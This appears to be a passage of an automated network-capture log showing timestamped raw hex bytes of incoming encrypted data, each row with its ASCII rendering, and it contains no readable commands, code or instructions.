4f fd cc f4 30 8f 7b 9d 57 51 5e c2 b3 84 1b 3b 36 be 55 36 14 89 e0 77 7d ca 6e 07 a5 64 79 88 a7 74 6a 7a c8 0b 52 cc 54 d1 1e 36 58 c5 f1 e2 cb 84 35 05 77 ae dd 33 81 54 4a f7 29 ba b5 67 b0 9a
                                                          Data Ascii: =|V?B+-k^$HKuV=vgT,.(!x%BSI:1g6j\)Wyo+100;ZI]~K6=&LOn.k]P:."0Al'gQZ$yW<OB9+[n3j(VO0{WQ^;6U6w}ndytjzRT6X5w3TJ)g
                                                          2021-10-13 15:10:52 UTC44INData Raw: 26 92 64 07 4f b8 7d 0b 15 28 38 c9 f8 c5 76 dc 1d e6 3f 4d 52 61 7a 62 91 43 1d 46 fa a5 73 cf 36 2e b8 1f 16 6a 43 3d 6a d3 6c 80 6c 4b 3b 2c 38 ec 8f af 6c 80 77 f2 b2 56 3d ce bb 17 d7 86 03 6d b9 a3 e6 fb 00 cc 9d b6 5d 63 93 fd 9c ce 4a 63 fe 43 4f d1 f6 cb 0d 35 77 b2 72 d6 fd 41 86 65 5d f2 5b b5 4b ec f5 ce 03 fc a9 7e 5b 5b 51 39 4e b1 4e f9 e4 89 ed 8f 74 47 2d e2 dc 66 9c 5e 22 a8 d3 ef 69 64 81 de a2 37 6a da 44 72 05 b5 53 90 3f aa 81 cc 40 2a a9 85 40 86 ac 3a 29 15 ee a0 b8 63 32 a2 1a d9 5d 30 fd 3e c2 fb f8 69 35 41 ed 4f 42 e3 6e 57 7f a7 b2 67 8e cd d1 3a 39 85 ae 6f fc 58 a3 13 37 83 6e cf f9 f7 87 45 4d 11 9d 1c 98 08 f6 eb ea b0 4c 6a 3c 7b bd 6c dc 97 dc 28 ee 3b 56 cb f7 7f 59 21 d7 c3 50 c7 65 eb 6f 13 55 e2 d4 10 b6 77 b2 4d b6
                                                          Data Ascii: &dO}(8v?MRazbCFs6.jC=jllK;,8lwV=m]cJcCO5wrAe][K~[[Q9NNtG-f^"id7jDrS?@*@:)c2]0>i5AOBnWg:9oX7nEMLj<{l(;VY!PeoUwM
                                                          2021-10-13 15:10:52 UTC45INData Raw: f7 12 37 a3 db b3 34 5e cf 19 a7 18 2e 37 52 44 64 f4 6f 0f a2 dd 78 c6 33 d0 a6 d9 81 bc a1 80 e8 b3 5a 2f 72 04 c6 8a a0 9b 0f ff ac 06 a3 7a 61 80 d1 47 35 6c 07 09 42 05 fc 04 60 64 d1 ad ee 10 48 4d 69 6d 34 39 ef 18 60 54 93 67 45 3f 28 f7 b5 3e bf 78 d1 53 23 3f 98 0f 6d 55 d8 ed 94 92 14 54 19 ba d9 da 93 f4 43 94 3e 55 c0 0b 28 f5 11 51 42 dc 3a f1 2d 79 2a ee 30 30 14 34 11 5a 4f 4e 4b b9 98 a1 80 4a e7 3e 03 2b 9b 3d e3 32 64 2c 44 fb 83 1a 3c ce cc cb ff 96 b0 c4 88 46 65 6a ae 95 b5 d5 be 0e e5 e1 64 c0 b8 9b d5 3b 2e 24 45 dc 94 9c 88 e1 6c 29 7e b9 19 8f ce 2f 76 46 e3 28 51 1c 88 24 3a 46 15 05 d7 5c bf 55 c1 2f 11 b1 0b a9 d7 8c 28 73 7c 20 f1 71 0d e1 ec d9 a9 7c 5e fb dd f3 32 80 0b a0 46 5b 58 c2 b4 8e ed 55 3c a8 5a 30 2d 18 c9 37 74
                                                          Data Ascii: 74^.7RDdox3Z/rzaG5lB`dHMim49`TgE?(>xS#?mUTC>U(QB:-y*004ZONKJ>+=2d,D<Fejd;.$El)~/vF(Q$:F\U/(s| q|^2F[XU<Z0-7t
                                                          2021-10-13 15:10:52 UTC47INData Raw: ba 5d 31 39 4e cb 4c c4 6a 40 9b 94 11 3f 1a e3 7d 25 82 4b 9e 0f e2 eb f6 f2 f4 52 39 4c 08 0a 0f 17 94 fe 9d 7a 61 86 c4 1c 38 75 00 54 97 99 00 14 2e 25 f3 57 ec b1 d6 0e e6 3a 56 51 62 09 71 97 54 77 f4 f5 ac 5d 45 24 29 d1 a6 b4 6a 49 58 62 c0 65 ae e7 60 a7 2a 57 e6 9f a9 09 7b 73 fb b4 55 5a de be 0a 6e 82 07 7c b6 dd c6 77 b7 f8 55 96 dd 22 90 fb f5 cc c6 60 f8 43 6c ba e3 ee 23 08 a9 a7 5d ed c3 32 a4 6d 4e f0 23 22 73 ec ff ce f5 c4 ae 54 50 95 51 3f 64 b0 58 f9 17 70 ed 9a 6e 32 58 e3 d2 4c 9f 5e 7f b3 e3 eb 37 ed 80 cf d1 eb 6a da 5f 67 1f e3 21 91 3f a4 81 54 41 2a a9 85 30 85 ac 36 0c 04 c4 19 be 0c fe a9 69 6c 83 3e d2 1c f2 94 2f 63 39 63 c6 40 54 fa be 6f 34 d8 9e 66 9f c6 e8 23 a1 96 ac 56 ac 73 92 15 1f 90 41 ca c7 aa 4c 45 4d 0a 47 61
                                                          Data Ascii: ]19NLj@?}%KR9Lza8uT.%W:VQbqTw]E$)jIXbe`*W{sUZn|wU"`Cl#]2mN#"sTPQ?dXpn2XL^7j_g!?TA*06il>/c9c@To4f#VsALEMGa
                                                          2021-10-13 15:10:52 UTC48INData Raw: 6e 7a 8c a7 e1 71 99 be 06 40 f4 30 11 ee fb 70 d4 bb 86 b0 a4 c5 20 b4 00 56 23 67 34 1b a8 43 be 0b 19 8f ea ba 7b 52 3a f7 18 1f 12 a8 3e 33 4d ce 74 39 c6 3a 18 69 75 1a 6c 65 1c af c8 7f 90 93 d0 a6 d9 4f 92 b5 91 e1 cd d4 06 de 01 d1 56 dc 0f 1d f3 92 d0 a1 7c 4b 87 c9 50 56 cc 91 0a 44 14 49 9d 77 77 df bd fa 13 48 4b 6e 43 0b 31 f8 7d ff 15 45 61 56 36 28 f8 b5 3a 8d 8e 5b 52 25 56 01 05 7c 55 da e3 9c f4 8c 59 31 26 c9 d0 84 92 e1 07 3f 53 d9 2c 71 ed 0b 75 f8 46 39 fb 06 29 b1 e5 18 a4 3d 8c 1b 77 7f 2e 61 aa 90 b3 6d 47 e7 3a 6c ba f4 15 eb 24 4a 13 48 ea 82 63 e6 cd ac e1 cb 8b a6 e2 c6 48 2c 6b a8 8e a8 f4 02 01 cd 83 08 ea bc f4 59 3c 3f 2e 45 5d 95 9c 88 2e 64 24 e1 8e 19 89 d7 34 6a 68 f3 ba 50 16 5c 09 68 5f 08 fb 56 55 ae 57 fd 03 3e d2
                                                          Data Ascii: nzq@0p V#g4C{R:>3Mt9:iuleOV|KPVDIwwHKnC1}EaV6(:[R%V|UY1&?S,quF9)=w.amG:l$JHcH,kY<?.E].d$4jhP\h_VUW>
                                                          2021-10-13 15:10:52 UTC49INData Raw: 62 6c 2c e6 fe e9 c5 90 ec 1f ab 9d a0 23 69 d6 fc af 30 fe 98 c1 3a 4c c0 56 71 87 6a 3a 82 60 fc b1 c8 39 3f 3e 4b ec c9 a9 52 26 3b 7f 29 73 84 95 cc 62 93 7e f3 08 e4 5f ef 46 4a 98 16 fc e1 d0 84 41 49 11 82 1a 06 17 08 af c1 8c 15 42 97 cf 08 5c a9 07 45 9a e1 39 53 5d 0d e3 55 c2 65 c2 1f f4 38 4d 38 6d 52 73 91 3d 30 de f7 aa 4a 57 24 3d d1 53 b6 6a 45 58 62 c0 65 ae f0 5c 2a 39 38 c9 8c af 60 c2 55 f9 be 7b 22 cb 96 bd 02 95 00 13 96 b0 e0 73 a6 fa 42 aa 1a 3d 91 fd 90 f4 dc 48 37 44 67 6e db 52 d5 31 bb bf a9 e8 d4 41 86 74 21 a1 28 0a 41 30 ee c0 01 c4 a9 7f 79 85 51 3d 64 4c 5e 54 4d 88 e3 8f 74 32 58 e0 c9 a5 9d fd 5f b1 ed eb 69 ed 80 dc a2 cd 68 a2 44 6e 17 9d 0d 90 3f bb 99 49 43 62 ae ad 64 ec ac 30 35 03 d6 94 93 63 34 a8 7a 60 4c 36 e1
                                                          Data Ascii: bl,#i0:LVqj:`9?>KR&;)sb~_FJAIB\E9S]Ue8M8mRs=0JW$=SjEXbe\*98`U{"sB=H7DgnR1At!(A0yQ=dL^TMt2X_ihDn?ICbd05c4z`L6
                                                          2021-10-13 15:10:52 UTC50INData Raw: fa 35 9d f8 95 40 73 f6 d3 b9 95 f4 3e 0c 3a 76 13 35 03 7b 5f 66 d5 7e 67 a3 73 7e 89 a6 56 74 66 db 0b 7a e5 5f ce 07 b1 66 e9 f8 db 0d b9 35 05 69 44 c5 3a 81 31 52 e8 3e 5f 9e 4b b9 a2 6c a1 b8 4f 0b a8 d8 58 8b 23 43 ad 65 19 16 05 6e ae 2f 21 3e e8 d3 fc 92 28 fa b8 b7 66 5f f2 cf f1 de 8a b0 cb 34 99 c0 99 74 ac bd 62 ef 2f c2 15 68 3b 3f 50 87 8f dc 6f 49 1f 59 a6 bf 91 a0 e1 88 90 0d 6a a6 74 b8 39 3c 7f ec 63 2a 22 22 cd 01 07 1f 66 f2 e2 b4 e7 f0 90 ea 07 b1 9d 5d 22 69 d6 18 de c9 2b 66 03 34 5e d7 a8 61 9b 76 18 99 01 b1 b1 c8 32 e3 2f 74 fb 03 f6 5d 39 2e 6e 3f 4c df 5a 3a 9d 71 13 35 09 88 55 80 90 38 27 1c ef f3 f1 a4 cb 51 39 40 17 78 85 1b bc da 8c 7f 19 bb ce 0e 37 4c 10 47 90 f0 05 1c 06 ee e2 55 c2 5e 76 0e e0 23 76 f6 4a 50 79 84 56
                                                          Data Ascii: 5@s>:v5{_f~gs~Vtfz_f5iD:1R>_KlOX#Cen/!>(f_4tb/h;?PoIYjt9<c*""f]"i+f4^av2/t]9.n?LZ:q5U8'Q9@x7LGU^v#vJPyV
                                                          2021-10-13 15:10:52 UTC51INData Raw: e8 e0 a2 96 a0 56 20 71 92 19 56 a1 95 cb c1 cf ae 92 4c 00 93 47 cc 08 f6 e7 f1 a0 44 66 44 5f 9b 60 cb 4b dc 2c d7 0f 47 db cc 15 5d 27 b8 0e 41 c0 47 90 5f 11 8d fb 20 33 b4 71 99 5b 84 d3 d1 dd 9e 8a 09 c4 83 9f 64 ad d7 c4 bc 63 7c a8 5b 00 ab df 3b a5 9b 34 4f 02 20 68 5f 20 82 5f c3 38 1f 76 3b 80 dd d3 37 b4 69 44 bf 6f 8d 38 56 31 a9 59 a6 da ff 0a b0 ba cc 00 34 ae 9c c9 bf 08 42 8c 93 0c 09 b0 37 e7 d5 de 2b 35 2c 0a 0d c4 3a 83 c2 d0 86 e3 60 08 6a b5 b0 4f 02 ca 76 55 11 49 9d 48 65 8f 1d 32 e7 15 76 fb 37 37 df 27 db 61 0e 15 01 60 02 80 67 bf 6e 70 e3 48 e1 71 93 11 02 48 e5 23 39 4e fb 70 de 93 2d b3 a4 c3 08 12 00 56 29 81 94 1b a8 9d b4 0c 31 ab ea ba 71 71 ec f7 19 0c 25 de b3 36 4c c8 67 51 18 2e 2c 57 51 1f 54 9a 0f a8 ce 72 a9 ae c7
                                                          Data Ascii: V qVLGDfD_`K,G]'AG_ 3q[dc|[;4O h_ _8v;7iDo8V1Y4B7+5,:`jOvUIHe2v77'a`gnpHqH#9Np-V)1qq%6LgQ.,WQTr
                                                          2021-10-13 15:10:52 UTC52INData Raw: dd 27 6d 53 cc c9 ef 1c 82 03 72 7f 27 2d 45 57 61 5d ea 3f 07 93 27 de e8 ae 2a 73 7a 33 fc 08 00 f0 ea c5 81 7e 5e 26 cc fe 23 86 64 84 44 41 5e d3 b8 9d e5 3a 1a 91 5a 36 3c af e1 77 77 20 7e 6d 73 5a 7e 89 a7 7e 60 66 db 01 52 dd 5e c8 0d c8 59 f1 f9 da 7c 98 34 05 68 af ce 39 81 5f 40 e8 3f 5f 84 48 b9 e2 76 91 bb 3e 57 a8 c9 2b 6a 23 43 b6 1c d8 2a 05 64 ae 01 86 16 e9 d5 ef d5 02 f8 b8 bb 63 0a f7 c4 2a e9 93 b2 cb ec e2 2f b1 43 a6 63 66 d9 03 f3 1e 40 09 33 78 b5 52 d5 64 97 1f 21 e4 94 90 aa cd 79 84 0f 6c b7 33 d7 3a 3c 73 c8 72 47 96 25 a2 c1 0a 16 7f 22 fa 82 c2 ff 52 ea 0d bc a4 6b 33 64 46 d5 db b1 3d 67 1f 3e 76 0d ab 67 9d 7b 3f b1 2b ab b1 c2 24 8c 12 44 fb 15 a9 5b 1f 21 6f 3f 47 d5 6c 1b 46 96 11 33 66 51 54 80 8b 3f 8a 1c ef e2 94 cd
                                                          Data Ascii: 'mSr'-EWa]?'*sz3~^&#dDA^:Z6<ww ~msZ~~`fR^Y|4h9_@?_Hv>W+j#C*dc*/Ccf@3xRd!yl3:<srG%"Rk3dF=g>vg{?+$D[!o?GlF3fQT?
                                                          2021-10-13 15:10:52 UTC54INData Raw: 45 56 3c 87 e5 65 86 a6 26 be 34 e1 19 b8 69 5b 81 6b 66 5b 21 f2 1c 2c 97 2f 6f 5a e9 fe 40 5e dc 45 7e 34 b7 b7 4f 76 c1 c0 32 b6 80 82 36 f9 70 98 04 ad a1 a9 c9 c1 c3 93 53 65 48 98 6f 1f 1f 6c 82 dd b5 92 7e 08 56 a2 87 df 9d c9 4f 64 03 56 c1 d1 93 5d 26 c6 c6 69 2b 4e 86 6a 06 45 a5 1b 10 b6 7b 88 d2 a6 2e d8 f5 48 9c 1f ea a4 b6 66 a7 c7 4f 9e 71 7a c7 79 2a 0a d9 2a a5 e5 16 22 24 24 43 6a 20 8d 5f ff 38 1f 76 3b 08 df d3 3b 9e 5d 5f d6 62 89 10 b1 23 a7 30 78 cc d7 48 8b 17 38 e8 51 58 66 db b1 7b 6c 9a bb 45 24 bc 2c ff 3a 8a 0d 37 2d 63 4b c2 12 67 1d 0e 95 a9 62 3d 6a b3 bc 4d 09 d6 d5 54 11 49 87 6a 32 44 1d 38 33 2d bb 2f cf e2 01 31 ca 2a 4f 2e 01 62 03 ac 6b f7 64 05 d8 2b e0 70 fc fa 03 48 ef e9 28 46 ec a6 cd 9b 3c bb b5 ca 86 a3 3f 2c
                                                          Data Ascii: EV<e&4i[kf[!,/oZ@^E~4Ov26pSeHol~VOdV]&i+NjE{.HfOqzy**"$$Cj _8v;;]_b#0xH8QXf{lE$,:7-cKgb=jMTIj2D83-/1*O.bkd+pH(F<?,
                                                          2021-10-13 15:10:52 UTC55INData Raw: 1e c2 de be f8 d6 79 b6 c4 b4 7f 29 7c 23 de a4 dc ae 11 c2 94 68 d6 a1 cf c2 2b 21 4d 77 41 94 96 91 f9 74 0c da ab 19 98 cf 38 7d be ca 96 5b 34 80 0d 79 51 0c 28 5a 46 ac 4d ec 04 12 a6 28 61 a5 82 2c 58 58 2c ec 73 12 f0 fb a4 9e 5f a0 fc e0 f2 32 82 6c eb 6c 59 5e d5 a6 bd f6 28 1a bb 48 29 23 eb e0 5b 78 c4 6e 7c 62 c2 c9 b6 32 7f 60 66 c4 21 41 cf 5e df 1f d7 7b 17 f9 f6 71 97 3d 14 6e d5 ea 3b 81 43 5f cb 2d 56 b4 5a ab bd 63 6f ba 63 5e 90 00 59 d5 23 5c a9 05 b4 16 14 76 bb 0c a1 14 c5 df fe ab 37 97 a4 b0 4e 07 ee e9 e4 e4 92 a3 d9 29 08 0b b5 7e d8 fb 6c ca 0d e6 13 74 22 21 78 ae 9d c3 70 69 1e 73 c1 85 9a b6 7f 88 1f 0c 6a a6 4a c2 14 3c 79 ce 6c 68 7f 25 a2 cb 18 09 7f 3e ec 80 dd d8 b4 14 0c 90 a5 74 2a 41 df c2 de c9 6e 4d 1d 34 58 c8 8d
                                                          Data Ascii: y)|#h+!MwAt8}[4yQ(ZFM(a,XX,s_2llY^(H)#[xn|b2`f!A^{q=n;C_-VZcoc^Y#\v7N)~lt"!xpisjJ<ylh%>t*AnM4X
                                                          2021-10-13 15:10:52 UTC56INData Raw: 42 8b 40 31 75 a6 60 80 1b 76 12 9e 7e 5d 7a e3 c9 76 8b d3 62 b3 e3 ea 7a f8 91 cb b4 4b 67 47 44 78 76 c0 0d 90 35 b3 a2 55 52 21 21 1a 7c 5c bf 27 37 0c fe c3 b8 63 34 b8 62 77 4d aa df 3d c1 94 29 06 35 4a fe 4a 45 fb 71 7f a8 8e b8 63 9f c4 af d2 a2 96 a0 68 06 72 cd 3f 2f 98 48 db d1 5f 90 54 46 11 89 f5 7a c4 f6 ed f3 af 48 17 ea 53 8a 66 d0 8c c4 31 d6 99 7e c0 f9 a2 4a 4f d7 c2 41 ca 5c 8d 7d 03 44 5b c9 39 ba 75 9f 4e e1 c2 da f5 44 d6 25 b7 fd bc 77 bd 4b c3 a7 79 6a d7 e5 6d 66 d9 2a a5 9d ea 4f d7 22 68 53 22 8d 66 19 2a 0f 67 82 30 c9 c2 3a a3 68 59 06 e9 e3 f5 5c 20 ad 2e b7 b5 0c 00 8a 1d 21 f9 b8 52 88 d8 b7 6e 68 9d 96 62 e8 bc 26 e3 ba d4 05 24 3c 6d 35 ec 38 89 18 1f 82 d7 4e 50 4e b7 ba 5a 1e a8 d8 50 7e 65 94 60 5b 9e 0c 10 34 13 70
                                                          Data Ascii: B@1u`v~]zvbzKgGDxv5UR!!|\'7c4bwM=)5JJEqchr?/H_TFzHSf1~JOA\}D[9uND%wKyjmf*O"hS"f*g0:hY\ .!Rnhb&$<m58NPNZP~e`[4p
                                                          2021-10-13 15:10:52 UTC57INData Raw: d3 01 33 22 02 5b 40 40 13 f1 2b 17 b0 ef 30 36 3c 8a 11 bd a4 5d 56 b2 90 b5 7f 50 c6 32 7d 9a 9a 3d e9 52 4c 02 55 88 36 0c c2 c5 a6 cf 61 85 b7 ee 81 a2 2e 6b a4 b7 bf d8 af 04 e5 3e 65 c0 b8 dc 93 3a 2e 28 02 5d 90 9c 84 d8 4f 01 c9 b3 0f a1 37 26 67 4a e3 9d 50 1c 88 1a 7c 46 1a 05 74 5d bf 55 c1 1e 73 06 27 9f ae a5 f7 ae 7a 33 fc 71 05 d8 b6 b6 81 78 53 f4 e4 1a 20 8a 62 ac a1 58 5e d5 91 c2 e5 3a 1c b9 5e 3f 14 f2 e2 77 71 fd 96 6e 73 4a 56 d4 a7 7e 66 75 dd 08 7a 34 5d ce 0b e0 b3 ea f8 dc 54 db 35 05 6e a9 c6 30 a9 58 44 e8 38 6c aa 4f b9 a4 5f cc bb 4f 51 bb df 51 fd 3c 47 bc 10 8e 36 01 64 a2 01 02 15 e9 d5 f4 ab 37 d0 96 b3 4e 0b e7 e7 d9 f6 92 b8 dd 1c a5 79 bb 76 a6 65 7f c3 16 fc 04 6c 19 d5 7b bf 89 cd 63 bf 38 5f d8 9e ff 88 e7 a0 81 1e
                                                          Data Ascii: 3"[@@+06<]VP2}=RLU6a.k>e:.(]O7&gJP|Ft]Us'z3qxS bX^:^?wqnsJV~fuz4]T5n0XD8lO_OQQ<G6d7Nyvel{c8_
                                                          2021-10-13 15:10:52 UTC59INData Raw: 7d a6 f6 45 af 73 39 48 71 a5 e6 c4 61 5c 54 6f 73 ee 47 34 3f a9 a6 f5 ef c2 55 92 7b 66 5e 28 0a 41 c4 ee c4 2b ce ba 7a 56 91 79 80 67 b0 58 e1 69 8e ed 8f 75 21 50 f3 c1 6a 87 4f 25 65 6f d4 69 ed 81 7c b3 5c 7d c6 44 6b cf 86 1c 96 e9 7a 25 7c 43 2a ae 0f 75 8e b8 24 30 34 6e 19 b8 69 1c b8 69 66 57 23 f0 25 c1 bc 8e 69 35 41 e1 50 7c 1c 61 6f 38 b7 b4 bd 88 18 df 1b b2 91 82 df f8 70 98 0c 27 a1 af cb c1 cf 50 5a 74 5d 43 7c 10 01 e7 e8 d1 5a 93 78 13 df cb 6c dc 9c e7 17 c7 03 5c c7 ec a4 5b f6 c4 c5 50 c6 5c 8f 52 2d ac 72 ac 19 9e d0 9f 48 84 c8 05 e7 66 be 09 c2 e6 9f 48 af d1 d3 bc 5a 43 c7 7f 08 75 d9 2c 85 8a 30 61 38 22 68 59 31 88 77 12 3b 1f 70 2e ab df d3 4b b3 78 4e c2 73 8c 38 46 20 a7 37 76 ea f8 00 8c 16 32 ff b5 70 8a c9 b3 77 7b 9a
                                                          Data Ascii: }Es9Hqa\TosG4?U{f^(A+zVygXiu!PjO%eoi|\}Dkz%|C*u$04niifW#%i5AP|ao8p'PZt]C|Zxl\[P\R-rHfHZCu,0a8"hY1w;p.KxNs8F 7v2pw{
                                                          2021-10-13 15:10:52 UTC60INData Raw: 71 1a 39 ef 12 76 14 38 67 45 3f c6 fe a4 32 eb e0 d2 53 2a 50 12 0e 77 53 cb ea 87 9b 05 58 6d 20 da da a8 9a c9 95 a7 52 d3 01 2f fc 00 5d 6a 47 39 f1 30 26 a4 ef 71 37 3c 8c 91 5a 49 4c 30 17 90 b5 74 40 de 76 79 b3 9d 30 c1 65 48 02 42 f1 80 24 80 cb ac e1 f2 a9 b5 e8 af 46 c6 6a ae 95 8c 7d af 02 c7 96 61 c9 96 6c 5c 3a 28 0a 04 43 94 9a aa 18 6a 01 c3 91 b8 89 dd 2d 74 44 cd 92 a1 1f 82 0f 51 79 1d 2d 43 75 57 5e ec 1f 28 18 27 9f ae bd 2d 75 52 ab ff 60 06 d8 c4 b4 81 78 76 15 cd fe 29 a2 c5 84 44 51 4d d6 a8 99 cd 14 18 aa 5c 20 14 3b e1 77 7d c3 80 6c 62 4b 56 a7 a5 7e 66 70 f3 2f 52 dd 54 d8 f3 c9 06 c5 ff ce 70 5b 92 05 68 ba df 3f a9 6b 42 e8 38 52 9c 65 b9 a2 7d 87 95 0f 24 8a da 58 d3 30 4b ad 1e 8e 4f 07 64 a2 46 77 17 e9 d5 e9 b2 2e fe d7
                                                          Data Ascii: q9v8gE?2S*PwSXm R/]jG90&q7<ZIL0t@vy0eHB$Fj}al\:(Cj-tDQy-CuW^('-uR`xv)DQM\ ;w}lbKV~fp/RTp[h?kB8Re}$X0KOdFw.
                                                          2021-10-13 15:10:52 UTC61INData Raw: fd bb c1 50 3e 3f b4 1f 79 6a 43 3d 50 3c 67 b9 ea 27 f6 2a 57 e6 98 51 64 f2 5f de af 76 1b 2f be 00 07 86 02 6d b6 9a 10 75 b7 f8 58 af 79 37 0a d5 48 e4 c4 66 d6 6b 65 64 f0 a4 76 3f a9 ad 5b ef ce 2e 4b 6f 4e fc 3f f4 49 eb 90 09 2b c4 a3 69 af 87 0e 13 50 c3 7c fb e4 8f fe 82 65 3f 50 8d e1 7e 9c 58 32 be f2 ef 06 c9 82 de a4 45 67 dd 3a 4b 1b 9d 0b 81 32 88 e0 47 43 2c c0 87 66 86 aa 36 35 11 a9 05 b9 63 3e 77 7c 43 75 07 f7 34 cf 87 21 1a 8a 4b fe 4a 59 d8 58 6f 32 ac 6c 5e 8e d3 d7 e2 b0 87 bb 6f e9 62 1c a4 08 51 bd 35 3e d4 80 52 9b 13 9f 7e 13 18 e6 d3 72 49 6d 87 c7 46 af 44 eb 9d cf 2a d5 0c 25 74 fd a2 46 2d ff fb 41 c0 47 58 6e 15 79 84 79 11 b6 30 ab 48 8e c2 db f5 4e 4c 09 c2 ec 6a 66 ad d1 77 b7 72 7b d2 7f 02 ab c3 2a af 8b 30 20 24 22
                                                          Data Ascii: P>?yjC=P<g'*WQd_v/muXy7Hfkedv?[.KoN?I+iP|e?P~X2Eg:K2GC,f65c>w|Cu4!KJYXo2l^obQ5>R~rImFD*%tF-AGXnyy0HNLjfwr{*0 $"
                                                          2021-10-13 15:10:52 UTC63INData Raw: a2 bc b7 d5 e2 dc d2 a9 72 02 c0 78 f8 89 1c f9 96 d5 ca 7b 61 9b b7 41 38 44 9a 19 46 12 97 a6 96 64 d7 83 7b 0c 1c c6 54 45 1a 38 fc 15 67 13 53 47 b6 3f 39 fe 38 23 90 f6 cd 75 b9 41 15 16 4d d2 cb eb 85 07 14 5f 28 00 1e da 95 9b 55 84 39 49 cc 38 a5 ed 07 46 4a c1 39 f1 2b 8a b1 e8 2c 16 e7 8c 11 5a d5 4c 44 b5 b0 27 7e 4b f6 aa 6c b4 85 22 98 b8 5d 05 5b f2 a9 af c2 cf ac 7b cb 80 a8 e2 89 d7 2e 6b ae 03 b5 db b0 09 ed 63 67 c0 be 68 4e 3d 31 2e 35 12 08 8d 85 ef 66 1e b3 25 08 8e c2 29 47 d5 cb ba 50 80 93 0e 66 58 00 51 d9 4c b8 40 fc 03 9c a8 20 80 b5 b8 b6 62 7d 2c ee 76 9c e1 ed a9 92 68 c2 ec cb e1 37 9c f8 95 43 44 4b c5 25 8e e2 25 0c 8a a5 36 3c 15 7d 66 70 ca 69 7b ef 5d 79 96 bf 68 fc 77 dc 1e 4b fd de ce 0d c8 c5 f8 ff c5 66 90 a9 14 6f
                                                          Data Ascii: rx{aA8DFd{TE8gSG?98#uAM_(U9I8FJ9+,ZLD'~Kl"][{.kcghN=1.5f%)GPfXQL@ b},vh7CDK%%6<}fpi{]yhwKfo
                                                          2021-10-13 15:10:52 UTC64INData Raw: 39 43 0d f8 1c 37 be c7 92 7a 6e 89 31 0f 1f 66 2c 40 a8 81 f7 ea d1 28 cb 55 c4 6d e6 07 e0 45 5d 57 4a da 73 97 43 6b 63 f7 ac 51 49 2f a3 a5 70 b4 6b 50 2e 57 db 73 d6 dd 48 3b 20 7f ba 8a af 60 c2 c0 fa be 77 91 ce a7 17 7f a9 06 7c b6 9a b7 71 b7 f8 3c 0d 74 21 9a 5f 8b ff dc 1e c2 45 67 6e de 93 0f 3f af c8 e4 ff ca 4b 24 7e 57 ef 56 36 4b ec f5 ec 72 c0 a9 78 3e 36 50 3f 6e 12 4f e0 e8 81 fe 9e 62 21 48 da 17 7e 9c 5e 32 a2 f2 fb f3 e0 89 e7 6e 56 6a da 5c 02 ad 9c 0d 9a 2c b3 bf 50 51 12 1e af 64 86 bd 23 35 0e 5c 0a bc 6a 25 ad 06 d5 5c 30 fd 27 c0 e7 4b 68 35 41 ed 46 45 f5 48 35 36 a6 b4 08 2a c3 c0 3e b7 68 ab 68 06 71 83 16 1f d2 47 ca c7 aa 33 44 4d 0a 8d 91 14 1f 08 ec e8 b2 ba 24 1d 53 8c 03 69 9c cf 2a d2 fd 57 dd 03 a3 2c 31 d2 eb 1c c4
                                                          Data Ascii: 9C7zn1f,@(UmE]WJsCkcQI/pkP.WsH; `w|q<t!_Egn?K$~WV6Krx>6P?nOb!H~^2nVj\,PQd#5\j%\0'Kh5AFEH56*>hhqG3DM$Si*W,1
                                                          2021-10-13 15:10:52 UTC65INData Raw: 95 1b a2 26 97 0d 31 b4 c2 d2 75 6b ea df 3c 1f 15 d1 9b 1d 4d c8 6d 13 04 31 21 69 1c 1a 6c 65 60 8a cf 72 b2 83 b8 a2 d3 94 9c 93 91 e1 d6 fa a3 73 02 db 5c ba 06 ab fb 1a 4a 75 6d 4e 9a ab e9 39 44 9a 01 9f 6a 95 8e 61 6d 59 32 7e 9d ff 9d 68 9f 0d ef 62 07 76 14 44 74 41 36 b7 49 b2 03 bc f7 db dd 92 47 c8 1d 73 40 c1 c0 9c 8a 01 49 3b 29 cb d0 0f b3 a0 91 3e 55 fb 25 39 fc 0a ff 7b 4d 2e 27 38 1c b1 e5 21 28 0d 6d 19 d4 fe 4b 72 9f 86 a6 75 42 78 81 6c b7 15 8a fe fe 5f 1d 57 f7 a2 13 d3 cb bd eb d2 96 bc 72 81 04 2a 6b a8 b7 80 dc af 08 6f 94 6c d7 68 e7 54 2b 22 35 fc 52 98 8d 8e e1 74 30 12 ca eb 88 dd 2d 74 49 da be 43 3d 94 1a 59 6f ad 28 45 5d ae 7e fd 35 9a aa 32 8e b1 b7 3d 6a 09 c0 fd 60 0a e3 fb a7 90 6a 76 7e ce fe 25 9c e9 83 44 5b 5f c7
                                                          Data Ascii: &1uk<Mm1!ile`rs\JumN9DjamY2~hbvDtA6IGs@I;)>U%9{M.'8!(mKruBxl_Wr*kolhT+"5Rt0-tIC=Yo(E]~52=j`jv~%D[_
                                                          2021-10-13 15:10:52 UTC66INData Raw: 11 b6 70 8c 6e 9f e4 cd e4 58 05 36 c2 ec b6 c4 bc f7 c1 9e c4 7b c7 75 2a f1 d9 2a a5 a2 dd 21 24 28 40 8e 30 88 7d 3a 1f 1f 70 5e b9 d0 c2 3e 9a 15 4a d0 75 e3 25 5d 20 ad 1b 4c cb f0 28 e4 13 32 f9 a4 6d 8b d8 bb 51 7b a7 82 1c 2a 94 49 ed a0 e3 44 28 2c 65 50 fd fe 89 1e 0e 82 d0 57 36 bc a6 ad 4d 1b af fa 04 00 55 8e b6 4e 98 36 71 28 07 63 f6 21 3a ce 00 b4 07 38 15 07 73 0c 97 ea e1 6e 70 e2 38 c2 60 b1 bb 12 5f 69 0a 39 4e fa d2 cf b1 39 9b 12 c3 08 1e 28 0c 29 4f 9f 33 45 48 b5 06 19 69 eb ba 7b 43 c8 f7 18 15 7a f3 b1 32 4b d9 70 28 ce 3d 2a 50 4c 0d e1 68 0f a8 cf 61 9e ba f6 b0 c2 85 38 88 91 e1 dd 70 3f 54 16 f9 e6 b3 88 16 ec b4 71 9c 7a 61 90 ce 7e 88 44 90 00 6e 2c 82 80 76 e9 d0 85 76 12 5b 68 6e 66 0c 28 f8 9e 49 14 45 66 e7 2e 1a ea 8c
                                                          Data Ascii: pnX6{u**!$(@0}:p^>Ju%] L(2mQ{*ID(,ePW6MUN6q(c!:8snp8`_i9N9()O3EHi{Cz2Kp(=*PLha8p?Tqza~Dn,vv[hnf(IEf.
